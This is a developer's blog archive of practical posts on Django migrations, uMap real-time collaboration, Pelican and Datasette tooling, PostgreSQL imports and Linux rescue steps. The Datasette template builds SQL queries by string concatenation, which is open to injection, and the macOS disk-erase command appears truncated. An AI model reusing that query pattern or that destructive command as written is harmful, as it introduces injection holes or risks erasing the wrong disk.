Alexis Métaireau - code

Changing the primary key of a model in Django

2024-02-22T00:00:00+01:00

I had to change the primary key of a django model, and I wanted to create a migration for this.

The previous model was using django automatic primary key fields

I firstly changed the model to include the new uuid field, and added the id field (the old primary key), like this:

    uuid = models.UUIDField(
        unique=True, primary_key=True, default=uuid.uuid4, editable=False
    )
    id = models.IntegerField(null=True, blank=True)

Then I created the migration, it:

Adds a new uuid field/column in the database
Iterate over the existing items in the table, and generates an uuid for them
Change the old primary key to a different type
Drop the old index
Mark the new uuid as a primary key.

To generate the migrations I did django-admin makemigrations, and iterated on it. Here is the migration I ended up with:

import uuid

from django.db import migrations, models

class Migration(migrations.Migration):
    dependencies = [
        ("umap", "0017_migrate_to_openstreetmap_oauth2"),
    ]

    operations = [
        # Add the new uuid field
        migrations.AddField(
            model_name="datalayer",
            name="uuid",
            field=models.UUIDField(
                default=uuid.uuid4, editable=False, null=True, serialize=False
            ),
        ),
        # Generate UUIDs for existing records
        migrations.RunSQL("UPDATE umap_datalayer SET uuid = gen_random_uuid()"),
        # Remove the primary key constraint
        migrations.RunSQL("ALTER TABLE umap_datalayer DROP CONSTRAINT umap_datalayer_pk"),
        # Drop the "id" primary key…
        migrations.AlterField(
            "datalayer", name="id", field=models.IntegerField(null=True, blank=True)
        ),
        # … to put it back on the "uuid"
        migrations.AlterField(
            model_name="datalayer",
            name="uuid",
            field=models.UUIDField(
                default=uuid.uuid4,
                editable=False,
                unique=True,
                primary_key=True,
                serialize=False,
            ),
        ),
    ]

Generating UUIDs in pure python

The uuid generation can also be done with pure python, like this. It works with all databases, but might be slower. Use it with migrations.RunPython().

def gen_uuid(apps, schema_editor):
    DataLayer = apps.get_model("umap", "DataLayer")
    for row in DataLayer.objects.all():
        row.uuid = uuid.uuid4()
        row.save(update_fields=["uuid"])

Getting the constraint name

One of the things that took me some time is to have a way to get the constraint name before removing it. I wanted to do this with the Django ORM, but I didn’t find how. So here is how in plain SQL. This only works with PostgreSQL, though.

migrations.RunSQL("""
DO $$
BEGIN
    EXECUTE 'ALTER TABLE umap_datalayer DROP CONSTRAINT ' || (
        SELECT indexname
        FROM pg_indexes
        WHERE tablename = 'umap_datalayer' AND indexname LIKE '%pkey'
    );
END $$;
"""),

Using uuids in URLs in a Django app

2024-02-22T00:00:00+01:00

After adding a regexp for uuids (which are quite hard to regexp for), I discovered that Django offers path converters, making this a piece of cake.

I was using old school re_path paths in my urls.py, but it’s possible to replace them with path, like this:

url_patterns = (
    path(
        "datalayer/<int:map_id>/<uuid:pk>/",
        views.DataLayerView.as_view(),
        name="datalayer_view",
    ),
)

A few default path converters are defined (str, int, slug, uuid, path), but it’s also possible to define your own, as specified in the docs.

Adding collaboration on uMap, third update

2024-02-12T00:00:00+01:00

I’ve spent the last few weeks working on uMap, still with the goal of bringing real-time collaboration to the maps. I’m not there yet, but I’ve made some progress that I will relate here.

JavaScript modules

uMap has been there since 2012, at a time when ES6 wasn’t out there yet.

At that time, it wasn’t possible to use JavaScript modules, nor modern JavaScript syntax. The project stayed with these requirements for a long time, in order to support people with old browsers. But as time goes on, we now have access to more browser features, and it’s now possible to use modules!

The team has been working hard on bringing modules to the mix. It wasn’t a piece of cake, but the result is here: we’re now able to use modern JavaSript modules and we are now more confident about which features of the browser we can use or not.

I then spent some time trying to integrate existing CRDTs like Automerge and YJS in our project. These two libs are unfortunately expecting us to use a bundler, which we aren’t currently.

uMap is plain old JavaScript, and as such is not using react or any other framework. The way I see this is that it makes it possible to have something “close to the metal” (if that means anything when it comes to web development).

As a result, we’re not tied to the development pace of these frameworks, and have more control on what we do (read “it’s easier to debug”).

So, after making tweaks and learning how “modules”, “requires” and “bundling” are working, I ultimately decided to take a break from this path, to work on the wiring with uMap. After all, CRDTs might not even be the way forward for us.

Internals

After some time with the head under the water, I’m now able to better understand the big picture, and I’m not getting lost in the details like I was at first.

Let me try to summarize what I’ve learned.

uMap appears to be doing a lot of different things, but in the end it’s:

Using Leaflet.js to render features on the map ;
Using Leaflet Editable to edit complex shapes, like polylines, polygons, and to draw markers ;
Using the Formbuilder to expose a way for the users to edit the features, and the data of the map
Serializing the layers to and from GeoJSON. That’s what’s being sent to and received from the server.
Providing different layer types (marker cluster, chloropleth, etc) to display the data in different ways.

Naming matters

There is some naming overlap between the different projects we’re using, and it’s important to have these small clarifications in mind:

Leaflet layers and uMap features

In Leaflet, everything is a layer. What we call features in geoJSON are leaflet layers, and even a (uMap) layer is a layer. We need to be extra careful what are our inputs and outputs in this context.

We actually have different layers concepts: the datalayer and the different kind of layers (chloropleth, marker cluster, etc). A datalayer, is (as you can guess) where the data is stored. It’s what uMap serializes. It contains the features (with their properties). But that’s the trick: these features are named layers by Leaflet.

GeoJSON and Leaflet

We’re using GeoJSON to share data with the server, but we’re using Leaflet internally. And these two have different way of naming things.

The different geometries are named differently (a leaflet Marker is a GeoJSON Point), and their coordinates are stored differently: Leaflet stores lat, long where GeoJSON stores long, lat. Not a big deal, but it’s a good thing to know.

Leaflet stores data in options, where GeoJSON stores it in properties.

This is not reactive programming

I was expecting the frontend to be organised similarly to Elm apps (or React apps): a global state and a data flow (a la redux), with events changing the data that will trigger a rerendering of the interface.

Things work differently for us: different components can write to the map, and get updated without being centralized. It’s just a different paradigm.

A syncing proof of concept

With that in mind, I started thinking about a simple way to implement syncing.

I left aside all the thinking about how this would relate with CRDTs. It can be useful, but later. For now, I “just” want to synchronize two maps. I want a proof of concept to do informed decisions.

Syncing map properties

I started syncing map properties. Things like the name of the map, the default color and type of the marker, the description, the default zoom level, etc.

All of these are handled by “the formbuilder”. You pass it an object, a list of properties and a callback to call when an update happens, and it will build for you form inputs.

Taken from the documentation (and simplified):

var tilelayerFields = [
    ['name', {handler: 'BlurInput', placeholder: 'display name'}],
    ['maxZoom', {handler: 'BlurIntInput', placeholder: 'max zoom'}],
    ['minZoom', {handler: 'BlurIntInput', placeholder: 'min zoom'}],
    ['attribution', {handler: 'BlurInput', placeholder: 'attribution'}],
    ['tms', {handler: 'CheckBox', helpText: 'TMS format'}]
];
var builder = new L.FormBuilder(myObject, tilelayerFields, {
    callback: myCallback,
    callbackContext: this
});

In uMap, the formbuilder is used for every form you see on the right panel. Map properties are stored in the map object.

We want two different clients work together. When one changes the value of a property, the other client needs to be updated, and update its interface.

I’ve started by creating a mapping of property names to rerender-methods, and added a method renderProperties(properties) which updates the interface, depending on the properties passed to it.

We now have two important things:

Some code getting called each time a property is changed ;
A way to refresh the right interface when a property is changed.

In other words, from one client we can send the message to the other client, which will be able to rerender itself.

Looks like a plan.

Websockets

We need a way for the data to go from one side to the other. The easiest way is probably websockets.

Here is a simple code which will relay messages from one websocket to the other connected clients. It’s not the final code, it’s just for demo puposes.

A basic way to do this on the server side is to use python’s websockets library.

import asyncio
import websockets
from websockets.server import serve
import json

# Just relay all messages to other connected peers for now

CONNECTIONS = set()

async def join_and_listen(websocket):
    CONNECTIONS.add(websocket)
    try:
        async for message in websocket:
            # recompute the peers-list at the time of message-sending.
            # doing so beforehand would miss new connections
            peers = CONNECTIONS - {websocket}
            websockets.broadcast(peers, message)
    finally:
        CONNECTIONS.remove(websocket)


async def handler(websocket):
    message = await websocket.recv()
    event = json.loads(message)

    # The first event should always be 'join'
    assert event["kind"] == "join"
    await join_and_listen(websocket)

async def main():
    async with serve(handler, "localhost", 8001):
        await asyncio.Future()  # run forever

asyncio.run(main())

On the client side, it’s fairly easy as well. I won’t even cover it here.

We now have a way to send data from one client to the other. Let’s consider the actions we do as “verbs”. For now, we’re just updating properties values, so we just need the update verb.

Code architecture

We need different parts:

the transport, which connects to the websockets, sends and receives messages.
the message sender to relat local messages to the other party.
the message receiver that’s being called each time we receive a message.
the sync engine which glues everything together
Different updaters, which knows how to apply received messages, the goal being to update the interface in the end.

When receiving a message it will be routed to the correct updater, which will know what to do with it.

In our case, its fairly simple: when updating the name property, we send a message with name and value. We also need to send along some additional info: the subject.

In our case, it’s map because we’re updating map properties.

When initializing the map, we’re initializing the SyncEngine, like this:

// inside the map
let syncEngine = new umap.SyncEngine(this)

// Then, when we need to send data to the other party
let syncEngine = this.obj.getSyncEngine()
let subject = this.obj.getSyncSubject()

syncEngine.update(subject, field, value)

The code on the other side of the wire is simple enough: when you receive the message, change the data and rerender the properties:

this.updateObjectValue(this.map, key, value)
this.map.renderProperties(key)

Syncing features

At this stage I was able to sync the properties of the map. A small victory, but not the end of the trip.

The next step was to add syncing for features: markers, polygon and polylines, alongside their properties.

All of these features have a uMap class representation (which extends Leaflets ones). All of them share some code in the FeatureMixin class.

That seems a good place to do the changes.

I did a few changes:

Each feature now has an identifier, so clients know they’re talking about the same thing. This identifier is also stored in the database when saved.
I’ve added an upsert verb, because we don’t have any way (from the interface) to make a distinction between the creation of a new feature and its modification. The way we intercept the creation of a feature (or its update) is to use Leaflet Editable’s editable:drawing:commit event. We just have to listen to it and then send the appropriate messages !

After some giggling around (ah, everybody wants to create a new protocol !) I went with reusing GeoJSON. It allowed me to have a better understanding of how Leaflet is using latlongs. That’s a multi-dimensional array, with variable width, depending on the type of geometry and the number of shapes in each of these.

Clearly not something I want to redo, so I’m now reusing some Leaflet code, which handles this serialization for me.

I’m now able to sync different types of features with their properties.

Point properties are also editable, using the already-existing table editor. I was expecting this to require some work but it’s just working without more changes.

What’s next ?

I’m able to sync map properties, features and their properties, but I’m not yet syncing layers. That’s the next step! I also plan to make some pull requests with the interesting bits I’m sure will go in the final implementation:

Adding ids to features, so we have a way to refer to them.
Having a way to map properties with how they render the interface, the renderProperties bits.

When this demo will be working, I’ll probably spend some time updating it with the latest changes (umap is moving a lot these weeks). I will probably focus on how to integrate websockets in the server side, and then will see how to leverage (maybe) some magic from CRDTs, if we need it.

See you for the next update!

Returning objects from an arrow function

2024-02-08T00:00:00+01:00

When using an arrow function in JavaScript, I was expecting to be able to return objects, but ended up with returning undefined values.

Turns out it’s not possible to return directly objects from inside the arrow function because they’re confused as statements.

This is covered by MDN.

To return an object, I had to put it inside parenthesis, like this:

latlngs.map(({ lat, lng }) => ({ lat, lng }))

Format an USB disk from the command-line on MacOSX

2023-12-25T00:00:00+01:00

sudo diskutil unmountDisk /dev/disk5
sudo diskutil eraseDisk "MS-DOS FAT32" Brocolis /dev/disk

Rescuing a broken asahi linux workstation

2023-12-08T00:00:00+01:00

On my main machine, I’m currently using Asahi Linux (on a macbook m1). I’ve recently broken my system, which wasn’t able to boot because of a broken /etc/fstab.

On my previous setups, I was able to easily plug an usb key and boot to it to solve my issues, but here I wasn’t sure how to deal with it.

After playing a bit (without much luck) with qemu and vagrant, someone pointed me to the right direction: using alpine linux.

Here’s what I did to solve my broken install:

First, install this alpine linux on a key.

Download the iso image here, and copy it to a key. I’m not sure why, but dd didn’t work for me, and I ended up using another tool to create the usb from the iso.

# When booting, press a key to enter u-boot. Then:
env set boot_efi_bootmgr
run bootcmd_usb0

Which should get you a session. When connected, do the following:

# to find the parition you want to mount, marked EFI something
lsblk -f
mount label="EFI - FEDOR" /mnt

# Install the wifi firmware
cd /lib/firmware
tar xvf /mnt/vendor/firmware.tar
/root/update-vendor-firmware
rm /etc/modprobe.d/blacklist-brcmfmac.conf
modprobe brcmfmac

# Connect to the wifi
/etc/init.d/iwd start
iwctl

In my case, I wanted to mount a btrfs filesystem to fix something inside.

apk add btrfs-progs
echo btrfs >> /etc/modules
modprobe btrfs
mount LABEL="fedora" /opt/fedora

I then could access the filesystem, and made a fix to it.

Resources:

https://arvanta.net/alpine/install-alpine-m1/
https://arvanta.net/alpine/iwd-howto/
https://wiki.alpinelinux.org/wiki/Btrfs

Using pelican to track my worked and volunteer hours

2023-11-23T00:00:00+01:00

I was tracking my hours in Datasette (article and follow-up), but I wasn’t really happy with the editing process.

I’ve seen David notes, which made me want to do something similar.

I’m consigning everything in markdown files and as such, was already keeping track of everything this way already. Tracking my hours should be simple otherwise I might just oversee it. So I hacked something together with pelican (the software I wrote for this blog).

It’s doing the following:

Defines a specific format for my worklog entries
Parses them (using a regexp), does some computation and ;
Uses a specific template to display a graph and progress bar.

Reading information from the titles

I actually took the format I’ve been already using in my log, and enhanced it a bit. Basically, the files look likes this (I’m writing in french):

---
title: My project
total_days: 25
---

## Mardi 23 Novembre 2023 (9h, 5/5)

What I did this day.
I can include [links](https://domain.tld) and whatever I want.
It won't be processed.

## Lundi 22 Novembre 2023 (8h rémunérées, 2h bénévoles, 4/5)

Something else.

Basically, the second titles (h2) are parsed, and should have the following structure: {day_of_week} {day} {month} {year} ({worked_hours}(, optional {volunteer_hours}), {fun_rank})

The goal here is to retrieve all of this, so I asked ChatGPT for a regexp and iterated on the result which got me:

pattern = re.compile(
        r"""
        (\w+)\s+                      # Day name
        (\d{1,2})\s+                  # Day number
        ([\wéû]+)\s+                  # Month name
        (\d{4})\s+                    # Year
        \(
        (\d{1,2})h                    # Hours (mandatory)
        (?:\s+facturées)?             # Optionally 'facturées', if not present, assume hours are 'facturées'
        (?:,\s*(\d{1,2})h\s*bénévoles)? # Optionally 'volunteer hours 'bénévoles'
        ,?                            # An optional comma
        \s*                           # Optional whitespace
        (?:fun\s+)?                   # Optionally 'fun' (text) followed by whitespace
        (\d)/5                        # Happiness rating (mandatory, always present)
        \)                            # Closing parenthesis
        """,
        re.VERBOSE | re.UNICODE,
    )

The markdown preprocessor

I’m already using a custom pelican plugin, which makes it possible to have pelican behave exactly the way I want. For instance, it’s getting the date from the filesystem.

I just had to add some features to it. The way I’m doing this is by using a custom Markdown reader, on which I add extensions and custom processors.

In my case, I added a preprocessor which will only run when we are handling the worklog. It makes it possible to change what’s being read, before the markdown lib actually transforms it to HTML.

Here is the code for it:

class WorklogPreprocessor(Preprocessor):
    pattern = "the regexp we've seen earlier"

    def run(self, lines):
        new_lines = []
        for line in lines:
            if line.startswith("##"):
                match = re.search(self.pattern, line)
                if not match:
                    raise ValueError("Unable to parse worklog title", line)
                (
                    day_of_week,
                    day,
                    month,
                    year,
                    payed_hours,
                    volunteer_hours,
                    happiness,
                ) = match.groups()

                volunteer_hours = int(volunteer_hours) if volunteer_hours else 0
                payed_hours = int(payed_hours)
                happiness = int(happiness)

                date = datetime.strptime(f"{day} {month} {year}", "%d %B %Y")
                self.data[date.strftime("%Y-%m-%d")] = {
                    "payed_hours": payed_hours,
                    "volunteer_hours": volunteer_hours,
                    "happyness": happiness,
                }

                # Replace the line with just the date
                new_lines.append(f"## 🗓️ {day_of_week} {day} {month} {year}")
            else:
                new_lines.append(line)
        return new_lines

It does the following when it encounters a h2 line:

try to parse it
store the data locally
replace the line with a simpler version
If if doesn’t work, error out.

I’ve also added some computations on top of it, which makes it possible to display a percentage of completion for the project, if “payed_hours” was present in the metadata, and makes it use a specific template (see later).

def compute_data(self, metadata):
    done_hours = sum([item["payed_hours"] for item in self.data.values()])

    data = dict(
        data=self.data,
        done_hours=done_hours,
        template="worklog",
    )

    if "total_days" in metadata:
        total_hours = int(metadata["total_days"]) * 7
        data.update(
            dict(
                total_hours=total_hours,
                percentage=round(done_hours / total_hours * 100),
            )
        )

    return data

Plugging this with pelican

Here’s the code for extending a custom reader, basically adding a pre-processor and adding back its data in the document metadata:

is_worklog = Path(source_path).parent.match("pages/worklog")

if is_worklog:
    worklog = WorklogPreprocessor(self._md)
    self._md.preprocessors.register(worklog, "worklog", 20)

# process the markdown, and then

if is_worklog:
    metadata["worklog"] = worklog.compute_data(metadata)

Adding a graph

Okay, everything is parsed, but it’s not yet displayed on the pages. I’m using vega-lite to display a graph.

Here is my template for this (stored in template/worklog.html), it’s doing a stacked bar chart with my data.

const spec = {
      "$schema": "https://vega.github.io/schema/vega-lite/v5.json",
      "width": 500,
      "height": 200,
      "data": 
        {
          "name": "table",
          "values": [
          {% for date, item in page.metadata.worklog.data.items() %}
            {"date": "{{ date }}", "series": "Rémunéré", "count": {{ item['payed_hours'] }}},
            {"date": "{{ date }}", "series": "Bénévole", "count": {{ item['volunteer_hours'] }}},
          {% endfor %}
          ]
        }
      ,
      "mark": "bar",
      "encoding": {
        "x": {
          "timeUnit": {"unit": "dayofyear", "step": 1},
          "field": "date",
          "axis": {"format": "%d/%m"},
          "title": "Date",
          "step": 1,
        },
        "y": {
          "aggregate": "sum",
          "field": "count",
          "title": "Heures",
        },
        "color": {
          "field": "series",
          "scale": {
            "domain": ["Bénévole", "Rémunéré"],
            "range": ["#e7ba52", "#1f77b4"]
          },
          "title": "Type d'heures"
        }
      }
    };

    vegaEmbed("#vis", spec)
        // result.view provides access to the Vega View API
      .then(result => console.log(result))
      .catch(console.warn);

I’ve also added a small progress bar, made with unicode, which looks like this.

▓▓░░░░░░░░ 29% (51h / 175 prévues)

Here is the code for it:

{% if "total_days" in page.metadata.keys() %}
      {% set percentage = page.metadata.worklog['percentage'] %}
      {% set total_blocks = 10 %}
      {% set percentage_value = (percentage / 100.0) %}
      {% set full_blocks = ((percentage_value * total_blocks) | round(0, 'floor') ) | int %}
      {% set empty_blocks = total_blocks - full_blocks %}
      <div class="progressbar">
        {# Display full blocks #}
        {% for i in range(full_blocks) %}▓{% endfor %}
        {# Display empty blocks #}
        {% for i in range(empty_blocks) %}░{% endfor %}
        {{ percentage }}% ({{ page.metadata.worklog['done_hours'] }}h / {{ page.metadata.worklog['total_hours'] }} prévues)
      </div>

Adding Real-Time Collaboration to uMap, second week

2023-11-21T00:00:00+01:00

I continued working on uMap, an open-source map-making tool to create and share customizable maps, based on Open Street Map data.

Here is a summary of what I did:

I reviewed, rebased and made some minor changes to a pull request which makes it possible to merge geojson features together ;
I’ve explored around the idea of using SQLite inside the browser, for two reasons : it could make it possible to use the Spatialite extension, and it might help us to implement a CRDT with cr-sqlite ;
I learned a lot about the SIG field. This is a wide ecosystem with lots of moving parts, which I understand a bit better now.

The optimistic-merge approach

There were an open pull request implementing an “optimistic merge”. We spent some time together with Yohan to understand what the pull request is doing, discuss it and made a few changes.

Here’s the logic of the changes:

On the server-side, we detect if we have a conflict between the incoming changes and what’s stored on the server (is the last document save fresher than the IF-UNMODIFIED-SINCE header we get ?) ;
In case of conflict, find back the reference document in the history (let’s name this the “local reference”) ;
Merge the 3 documents together, that is :
Find what the the incoming changes are, by comparing the incoming doc to the local reference.
Re-apply the changes on top of the latest doc.

One could compare this logic to what happens when you do a git rebase. Here is some pseudo-code:

def merge_features(reference: list, latest: list, incoming: list):
    """Finds the changes between reference and incoming, and reapplies them on top of latest."""
    if latest == incoming:
        return latest

    reference_removed, incoming_added = get_difference(reference, incoming)

    # Ensure that items changed in the reference weren't also changed in the latest.
    for removed in reference_removed:
        if removed not in latest:
            raise ConflictError

    merged = copy(latest)
    # Reapply the changes on top of the latest.
    for removed in reference_removed:
        merged.delete(removed)

    for added in incoming_added:
        merged.append(added)

    return merged

The pull request is not ready yet, as I still want to add tests with real data, and enhance the naming, but that’s a step in the right direction :-)

Using SQLite in the browser

At the moment, (almost) everything is stored on the server side as GeoJSON files. They are simple to use, to read and to write, and having them on the storage makes it easy to handle multiple revisions.

I’ve been asked to challenge this idea for a moment. What if we were using some other technology to store the data? What would that give us? What would be the challenges?

I went with SQLite, just to see what this would mean.

SQLite is originally not made to work on a web browser, but thanks to Web Assembly, it’s possible to use it. It’s not that big, but the library weights 2Mb.
With projects such as CR-SQLite, you get a way to add CRDTs on top of SQLite databases. Meaning that the clients could send their changes to other clients or to the server, and that it would be easy to integrate ;
The clients could retrieve just some part of the data to the server (e.g. by specifying a bounding box), which gives it the possibility to not load everything in memory if that’s not needed.

I wanted to see how it would work, and what would be the challenges around this technology. I wrote a small application with it. Turns out writing to a local in-browser SQLite works.

Here is what it would look like:

Each client will get a copy of the database, alongside a version ;
When clients send changes, you can just send the data since the last version ;
Databases can be merged without loosing data, the operations done in SQL will trigger writes to a specific table, which will be used as a CRDT.

I’m not sure SQLite by itself is useful here. It sure is fun, but I don’t see what we get in comparison with a more classical CRDT approach, except complexity. The technology is still quite young and rough to the edges, and uses Rust and WebASM, which are still strange beasts to me.

Here are some interesting projects I’ve found this week :

Leaflet.offline allows to store the tiles offline ;
geojson-vt uses the concept of “vector tiles” I didn’t know about. Tiles can return binary or vectorial data, which can be useful to just get the data in one specific bounding box This allows us for instance to store GeoJSON in vector tiles.
mapbox-gl-js makes it possible to render SIG-related data using WebGL (no connection with Leaflet)
leaflet-ugeojson and leaflet.Sync allows multiple people to share the same view on a map.

Two libraries seems useful for us:

Leaflet-GeoSSE makes it possible to use SSE (Server Sent Events) to update local data. It uses events (create, update, delete) and keys in the GeoJSON features..
Leaflet Realtime does something a bit similar, but doesn’t take care of the transport. It’s meant to be used to track remote elements (a GPS tracker for instance)

I’m noting that:

In the two libraries, unique identifiers are added to the features to allow for updates.
None of these libraries makes it possible to track local changes. That’s what’s left to find.

How to transport the data?

One of the related subjects is transportation of the data between the client and the server. When we’ll get the local changes, we’ll need to find a way to send this data to the other clients, and ultimately to the server.

There are multiple ways to do this, and I spent some time trying to figure out the pros and cons of each approach. Here is a list:

WebRTC, the P2P approach. You let the clients talk to each other. I’m not sure where the server fits in this scenario. I’ve yet to figure-out how this works out in real-case scenarii, where you’re working behind a NAT, for instance. Also, what’s the requirement on STUN / Turn servers, etc.
Using WebSockets seems nice at the first glance, but I’m concerned about the resources this could take on the server. The requirement we have on “real-time” is not that big (e.g. if it’s not immediate, it’s okay).
Using Server Sent Events is another way to solve this, it seems lighter on the client and on the server. The server still needs to keep connexion opens, but I’ve found some proxies which will do that for you, so it would be something to put between the uMap server and the HTTP server.
Polling means less connexion open, but also that the server will need to keep track of the messages the clients have to get. It’s easily solvable with a Redis queue for instance.

All of these scenarii are possible, and each of them has pros and cons. I’ll be working on a document this week to better understand what’s hidden behind each of these, so we can ultimately make a choice.

Server-Sent Events (SSE)

Here are some notes about SSE. I’ve learned that:

SSE makes it so that server connections never ends (so it consumes a process?)
There is a library in Django for this, named django-eventstream
Django channels aims at using ASGI for certain parts of the app.
You don’t have to handle all this in Django. It’s possible to delegate it to pushpin, a proxy, using django-grip

It’s questioning me in terms of infrastructure changes.

Importing a PostgreSQL dump under a different database name

2023-11-20T00:00:00+01:00

For Chariotte, I’ve had to do an import from one system to the other. I had no control on the export I received. It contained the database name and the ACLs, which I had to change to match the ones on the new system.

Decrypting the dump

First off, the import I received was encrypted, so I had to decrypt it. It took me some time to figure out that both my private and public keys needed to be imported to the pgp. Once that was done, I could decrypt with

# Decrypt the file
gpg --decrypt hb_chariotte_prod.pgdump.asc > hb_chariotte_prod.pgdump

# Upload it to the server with scp
scp hb_chariotte_prod.pgdump  chariotte:.

Importing while changing ACLs and database name

On the server, here is the command to change the name of the database and the user. The file I received was using the so-called “custom” format, which is not editable with a simple editor, so you have to export it to SQL first, and then edit it before running the actual queries.

# Convert to SQL, then replace the table name with the new one, and finally run the SQL statements.
pg_restore -C -f - hb_chariotte_prod.pgdump | sed 's/hb_chariotte_prod/chariotte_temp/g' | psql -U chariotte_temp -d chariotte_temp -h yourhost

Deploying and customizing datasette

2023-11-12T00:00:00+01:00

First, create the venv and install everything

# Create and activate venv
python3 -m venv venv
source venv/bin/activate

# Install datasette…
pip install datasette

# … and the plugins
datasette install datasette-render-markdown datasette-dashboards datasette-dateutil

I was curious how much all of this was weighting. 30MB seems pretty reasonable to me.

# All of this weights 30Mb
du -sh venv
30M venv

Adding authentication

Datasette doesn’t provide authentication by default, so you have to use a plugin for this. I’ll be using Github authentication for now as it seems simple to add:

pip install datasette-auth-github

I’ve had to create a new github application and export the variables to my server, and add some configuration to my metadata.yaml file:

allow:
  gh_login: almet

plugins:
  datasette-auth-github:
    client_id:
      "$env": GITHUB_CLIENT_ID
    client_secret:
      "$env": GITHUB_CLIENT_SECRET

If that’s useful to you, here is the git repository I’m deploying to my server.

Using templates

Okay, I now want to be able to send an URL to the people I’m working with, on which they can see what I’ve been doing, and what I’ve been using my time on.

It was pretty simple to do, and kind of weird to basically do what I’ve been doing back in the days for my first PHP applications : put SQL statements in the templates ! heh.

I’ve added a template with what I want to do. It has the side-effect of being able to propose a read-only view to a private database.

<h1>{{project}}
    {% for row in sql("SELECT SUM(CAST(duration AS REAL)) as total_hours FROM journal WHERE project = '" + project + "';", database="db") %}
({{ row["total_hours"] }} heures)
{% endfor %}
</h1>
<dl>
    {% for row in sql("select date, CAST(duration AS REAL) as duration, content from journal where project = '" + project + "' order by date DESC", database="db") %}
        <dt>{{ row["date"] }} ({{ row["duration"] }} heures)</dt>
        <dd>{{ render_markdown(row["content"]) }}</dd>
    {% endfor %}
</dl>

Which looks like this :

Adding Real-Time Collaboration to uMap, first week

2023-11-11T00:00:00+01:00

Last week, I’ve been lucky to start working on uMap, an open-source map-making tool to create and share customizable maps, based on Open Street Map data.

My goal is to add real-time collaboration to uMap, but we first want to be sure to understand the issue correctly. There are multiple ways to solve this, so one part of the journey is to understand the problem properly (then, we’ll be able to chose the right path forward).

Part of the work is documenting it, so expect to see some blog posts around this in the future.

Installation

I’ve started by installing uMap on my machine, made it work and read the codebase. uMap is written in Python and Django, and using old school Javascript, specifically using the Leaflet library for SIG-related interface.

Installing uMap was simple. On a mac:

Create the venv and activate it

python3 -m venv venv
source venv/bin/activate
pip install -e .

Install the deps : brew install postgis (this will take some time to complete)

createuser umap
createdb umap -O umap
psql umap -c "CREATE EXTENSION postgis"

Copy the default config with cp umap/settings/local.py.sample umap.conf

# Copy the default config to umap.conf
cp umap/settings/local.py.sample umap.conf
export UMAP_SETTINGS=~/dev/umap/umap.conf
make install
make installjs
make vendors
umap migrate
umap runserver

And you’re done!

On Arch Linux, I had to do some changes, but all in all it was simple:

createuser umap -U postgres
createdb umap -O umap -U postgres
psql umap -c "CREATE EXTENSION postgis" -Upostgres

Depending on your installation, you might need to change the USER that connects the database.

The configuration could look like this:

DATABASES = {
    "default": {
        "ENGINE": "django.contrib.gis.db.backends.postgis",
        "NAME": "umap",
        "USER": "postgres",
    }
}

How it’s currently working

With everything working on my machine, I took some time to read the code and understand the current code base.

Here are my findings :

uMap is currently using a classical client/server architecture where :
The server is here mainly to handle access rights, store the data and send it over to the clients.
The actual rendering and modifications of the map are directly done in JavaScript, on the clients.

The data is split in multiple layers. At the time of writing, concurrent writes to the same layers are not possible, as one edit would potentially overwrite the other. It’s possible to have concurrent edits on different layers, though.

When a change occurs, each DataLayer is sent by the client to the server.

The data is updated on the server.
If the data has been modified by another client, an HTTP 422 (Unprocessable Entity) status is returned, which makes it possible to detect conflicts. The users are prompted about it, and asked if they want to overwrite the changes.
The files are stored as geojson files on the server as {datalayer.pk}_{timestamp}.geojson. A history of the last changes is preserved (The default settings preserves the last 10 revisions).
The data is stored in a Leaflet object and backups are made manually (it does not seem that changes are saved automatically).

Data

Each layer consists of:

On one side are the properties (matching the _umap_options), and on the other, the geojson data (the Features key).
Each feature is composed of three keys:
geometry: the actual geo object
properties: the data associated with it
style: just styling information which goes with it, if any.

Real-time collaboration : the different approaches

Behind the “real-time collaboration” name, we have :

The streaming of the changes to the clients: when you’re working with other persons on the same map, you can see their edits at the moment they happen.
The ability to handle concurrent changes: some changes can happen on the same data concurrently. In such a case, we need to merge them together and be able to
Offline editing: in some cases, one needs to map data but doesn’t have access to a network. Changes happen on a local device and is then synced with other devices / the server ;

Keep in mind these notes are just food for toughs, and that other approaches might be discovered on the way

I’ve tried to come up with the different approaches I can follow in order to add the collaboration features we want.

JSON Patch and JSON Merge Patch: Two specifications by the IETF which define a format for generating and using diffs on json files. In this scenario, we could send the diffs from the clients to the server, and let it merge everything.
Using CRDTs: Conflict-Free Resolution Data Types are one of the other options we have lying around. The technology has been used mainly to solve concurrent editing on text documents (like etherpad-lite), but should work fine on trees.

JSON Patch and JSON Merge Patch

I’ve stumbled on two IETF specifications for JSON Patch and JSON Merge Patch which respectively define how JSON diffs could be defined and applied.

There are multiple libraries for this, and at least one for Python, Rust and JS.

It’s even supported by the Redis database, which might come handy in case we want to stream the changes with it.

If you’re making edits to the map without changing all the data all the time, it’s possible to generate diffs. For instance, let’s take this simplified data (it’s not valid geojson, but it should be enough for testing):

source.json

{
    "features": [
        {
            "key": "value"
        }
    ],
    "not_changed": "whatever"
}

And now let’s add a new object right after the first one :

destination.geojson

{
    "features": [
        {
            "key": "value"
        },
        {
            "key": "another-value"
        }
    ],
    "not_changed": "whatever"
}

If we generate a diff:

pipx install json-merge-patch
json-merge-patch create-patch source.json destination.json
{
    "features": [
        {
            "key": "value"
        },
        {
            "key": "another-value"
        }
    ]
}

Multiple things to note here:

It’s a valid JSON object
It doesn’t reproduce the not_changed key
But… I was expecting to see only the new item to show up. Instead, we are getting two items here, because it’s replacing the “features” key with everything inside.

This is actually what the specification defines:

4.1. add

The “add” operation performs one of the following functions, depending upon what the target location references:

o If the target location specifies an array index, a new value is inserted into the array at the specified index.

o If the target location specifies an object member that does not already exist, a new member is added to the object

o If the target location specifies an object member that does exist, that member’s value is replaced.

It seems too bad for us, as this will happen each time a new feature is added to the feature collection.

It’s not working out of the box, but we could probably hack something together by having all features defined by a unique id, and send this to the server. We wouldn’t be using vanilla geojson files though, but adding some complexity on top of it.

At this point, I’ve left this here and went to experiment with the other ideas. After all, the goal here is not (yet) to have something functional, but to clarify how the different options would play off.

Using CRDTs

I’ve had a look at the two main CRDTs implementation that seem to get traction these days : Automerge and Yjs.

I’ve first tried to make Automerge work with Python, but the Automerge-py repository is outdated now and won’t build. I realized at this point that we might not even need a python implementation:

In this scenario, the server could just stream the changes from one client to the other, and the CRDT will guarantee that the structures will be similar on both clients. It’s handy because it means we won’t have to implement the CRDT logic on the server side.

Let’s do some JavaScript, then. A simple Leaflet map would look like this:

import L from 'leaflet';
import 'leaflet/dist/leaflet.css';

// Initialize the map and set its view to our chosen geographical coordinates and a zoom level:
const map = L.map('map').setView([48.1173, -1.6778], 13);

